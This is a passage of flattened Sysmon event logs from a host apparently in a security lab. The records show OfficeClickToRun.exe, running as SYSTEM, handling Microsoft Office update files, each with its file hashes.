14:55:16.392{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\OMSINTL.DLLMD5=E0BFDD4EB9DC8BF9B13B78A394E8739F,SHA256=29B0AF237DCBE784A5F3B69180CC07D9DF66636DA2B888AD74502C6FD7A7895C,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000068441Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.376{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\OMICAUTINTL.DLLMD5=2FE1ECCA826F4F4ED52EB358316E307E,SHA256=A28D3FAA3A30E2771CC8BCC36B06E41232F0B118CFBA86770A5C54D263D24D6C,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000068440Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.376{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\offsymxl.ttfMD5=50E2608359D97136AC3B0EF3315BC3B1,SHA256=8979513FB0445F517C2BCE1A8A10049EB947D23E1ACE3EA49897805A454483D4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068439Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.376{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\offsymxb.ttfMD5=A4E13A74DB4FFA968FA10967AAAA9688,SHA256=0BD96131CB945316975312F4A86EC3EEA24AF06B19E2EF947F99D317EC5B7B2B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068438Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.361{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\offsymt.ttfMD5=BB6C5DFF6F01C404D3199CEF18221C6C,SHA256=2E9A03508718B983C8C015F89FABC1DB298D5AEAA487BC98997AEBB32EC72A42,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068437Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.361{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\offsymsl.ttfMD5=842B956778BB06860DFF3EB942721936,SHA256=F481D50C009EEC5C34ECA60283F6C99E1ACF3D3AEF63DC6D9336055131ABE575,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068436Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.330{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\offsymsb.ttfMD5=B91BFE31C517C8FE78D8D620A7D607D1,SHA256=D07CF591F93226E8C16457ACC2CA64EB7606370625DF6B8A830F302CC6C99FEE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068435Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.314{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\offsyml.ttfMD5=65AF8DCB86766585AC3324F4A66E401F,SHA256=DC89D77CA4C5192075490840D0D253ED4EF2252A358413B70AA3E341CDF9DD16,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068434Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.314{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\offsymk.ttfMD5=73434F5FECB21ACE0E9E1D5A9301E1C6,SHA256=2AF8973BA87AC71A79227AE231964D7E0E5E9C76F95AD24270B15EB5D61CBEE8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068433Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.314{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\offsymb.ttfMD5=EAD06B1E96235E4ABA09A072E5A4973F,SHA256=3427BED0A0F0299DE47948087E396A4DAEB20C0C0F22400F77EBBF29083FE5E6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068432Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.283{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\offsym.ttfMD5=5FC3482E2756E2FB80DA03DCD2D9287B,SHA256=BF6CC156E9D0D9443655FE741FEBEAD3545167816BB6319A9B7137B1AF8E0A95,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068431Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.267{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\officeinventoryagentlogon.xmlMD5=5FA24116188AE6F686320A8B190C0EEA,SHA256=BE1BCCB56A1187267A73AFA348AE0919BC7772EA2260A9CE8524EBD5554DEE4A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068430Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.267{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\officeinventoryagentfallback.xmlMD5=BA5EEECEE8DCFA22E8486E8836E2DBB8,SHA256=87CE7D2E77AFF4F7314E75EE4F860E66F6AE1AD5D6C81EAF7E38FD3EE14AB03B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068429Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.267{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\OcPubRes.dllMD5=ACF22281B516845DA18A728A7AE247DF,SHA256=D5271FE84DCDCDB336B16936BE83783527A9ED30551380C456AE5B2EF965971E,IMPHASH=8CB32FCFB7068FC225DB27CCFBED2A1Atruetrue 23542300x800000000000000068428Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.252{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\OcHelperResource.dllMD5=628D9B5D08C264765197C7AB61C5AAB5,SHA256=C928A43F6B215926E6719719674DA00B45D7F89A9D719023B55DA4C443A689BA,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000068427Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.252{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\ocapires.dllMD5=43E6D77A80021B791D86B77021FEC515,SHA256=471D073CD1A19D5DCFE564664F92624732D523A36400F62AB73007DE87A171B1,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000068426Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.252{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\MSSRINTL.DLLMD5=5D5A56831137A467092796668FAB9228,SHA256=D5A5C66FEF824EFC2D43938DB3F195A014A8356B2059783D77926AEF4743DE2E,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000068425Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.252{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\MSQRY32.CHMMD5=05D96A79544107BFE04C861B13D87A66,SHA256=03A60568C18822BA0C173FBCD280524E2E9785B16C0C1E24386111B6075F692A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068424Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.236{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\MSPUB_K_COL.HXKMD5=DB9742E49C49C505B293A84518E95FA5,SHA256=1C17B95E5098ADB0C0E06AAC8A8C7C50C6A5EF1B696465D548C8A922F1D3A653,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068423Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.236{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\MSPUB_F_COL.HXKMD5=B8FBBC73DDDE31636552AB184B4E398F,SHA256=3C3702253A4695B5BCB18A2565B1D49F9F32F5F9F2442FD1395197970FA34EDB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068422Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.236{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\MSPUB_COL.HXTMD5=6E8D2A7B74F0239471E336F700198F0D,SHA256=2B25658312BD00C2F73564A58E9F260737840E381317522BBEB766A2614D4EE8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068421Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.236{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\MSPUB_COL.HXCMD5=C8FE2A0281820DD9394665C32ACA2B64,SHA256=99E93D2AF41804DA8A4A6C3E594000ED4F468161BECCBBC3E32AAF1E7BA87348,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068420Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.236{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\MSPUB.OPGMD5=A894191ACD8B89C7B12D62B757A02059,SHA256=CD6640BBC12972FD070E982355886CC415637F6C77B8BB5D3EBE377D859F0354,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068419Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.236{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\MSPUB.HXSMD5=4F0C130D57FBB48557C9CB576AD78D45,SHA256=955E76405E369CB2784CA3D800DEB16A3F0D0632D3DC4FBF0C4F7052A4D233E6,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000068418Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\MSOUC_K_COL.HXKMD5=DB9742E49C49C505B293A84518E95FA5,SHA256=1C17B95E5098ADB0C0E06AAC8A8C7C50C6A5EF1B696465D548C8A922F1D3A653,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068417Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\MSOUC_F_COL.HXKMD5=B8FBBC73DDDE31636552AB184B4E398F,SHA256=3C3702253A4695B5BCB18A2565B1D49F9F32F5F9F2442FD1395197970FA34EDB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068416Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\MSOUC_COL.HXTMD5=ED08C04371582B6932492431B3D1827A,SHA256=993960CB9E51CCC9CEA749F7891EAEC59E3C64C6ECB27EA5CD533AC25A009677,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068415Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\MSOUC_COL.HXCMD5=DD1622D82ECFCF7B33B433C491802DBA,SHA256=8DFA250AE939CE526EBABA84BDE5DD45B054E203A2D1BD0E8F5B063629134A1B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068414Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\MSOUC.HXSMD5=525A0AA7F7283EE4B041372CDFB9C810,SHA256=973167F4E31EB27D3440DB4542B4C4F5462AC75AAAB671F76A09EFC8C476E841,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000068413Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\msotelemetryintl.dllMD5=33A53240C676EB9E821FE41D7FB4B6CB,SHA256=A2810152865903EA0B73D4C9A4932898DC3F92B399E889B236E5E3ED8DDFE85B,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000068412Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\msotdintl.dllMD5=A0D1D95E0B8CBA37DB86A4C224C6F556,SHA256=2320D8869F751CF1160F378CAC3447BDC566DB1C9D3394A4941317D40F3A6298,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000068411Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\MSO.ACLMD5=CED43D4FEC3951BF64FF86935C28F5D8,SHA256=B39BA3C8A1A773D123F0E9FC5E73DE907850CCBA6749310F966E11EABD0A3243,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068410Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\MSAIN.DLLMD5=97FB050E79B477D9339597E90C40819B,SHA256=554AC53295165774A3EF5EF29B6A31AF1E720878C22AD7D0AC496C91BC6F6092,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000068409Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\MSACCESS_K_COL.HXKMD5=DB9742E49C49C505B293A84518E95FA5,SHA256=1C17B95E5098ADB0C0E06AAC8A8C7C50C6A5EF1B696465D548C8A922F1D3A653,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068408Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\MSACCESS_F_COL.HXKMD5=B8FBBC73DDDE31636552AB184B4E398F,SHA256=3C3702253A4695B5BCB18A2565B1D49F9F32F5F9F2442FD1395197970FA34EDB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068407Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\MSACCESS_COL.HXTMD5=51DD3A08F9915CE3E2D2362A9AAB2476,SHA256=895DC5EC34A53A8FAFECCDA897727D6780719F91011B26629832AA6FE794986D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068406Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\MSACCESS_COL.HXCMD5=844C564EF711FDF3EBEEF2E73EE36C80,SHA256=FA2451BB0B052AB04F36303AA8D7CA823692411E69FA6C97FA9B537879325E1F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068405Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\MSACCESS.HXSMD5=73DADD3F136600C191C688A501EB2660,SHA256=63FB0F016DD5556E58F88EBA3C513ABD3ADBDCE150CDB89754FE7DAD70042CFC,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000068404Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\MOR6INT.DLLMD5=0E89D284DB399053FC6496CC5477EBA8,SHA256=1573264BAED2F529EEC00D541A14231CCE3CD58888430A43DD4A8B2A9C66C741,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000068403Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.173{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\MidgardStrings.Rollback.jsonMD5=68C7223B89FE86278DDE69363BD66D92,SHA256=7E1620EF6CE270D0241B6F513040C531D40C00A4DC878988027F4074980810CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068402Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.173{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\MidgardStrings.jsonMD5=BD74D03A895870845C01F3F546F7854C,SHA256=D88B6A89E75B1077AEFB6EEE331EE69BD296CFD387821F487B2C0EA90D3E4EE0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068401Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.173{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\MAPISHELLR.DLLMD5=16936580F72DFB0D578C3A44C4E8B6C4,SHA256=C6A89BB7CD9C01FBCD04AA01850922406144DEB0CCE1F6C99C905DABCF1D1AEC,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000068400Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.173{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\MAPIR.DLLMD5=FE8D9F3065AA9AE3FB9FE7F4D9681242,SHA256=C7CC2BAF48B6F4087E03EC04A9685506AAC1DD2446C585B2002414A89D7DA2D6,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000068399Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.142{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\LYNC_ONLINE_K_COL.HXKMD5=DB9742E49C49C505B293A84518E95FA5,SHA256=1C17B95E5098ADB0C0E06AAC8A8C7C50C6A5EF1B696465D548C8A922F1D3A653,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068398Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.142{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\LYNC_ONLINE_F_COL.HXKMD5=B8FBBC73DDDE31636552AB184B4E398F,SHA256=3C3702253A4695B5BCB18A2565B1D49F9F32F5F9F2442FD1395197970FA34EDB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068397Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.142{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft 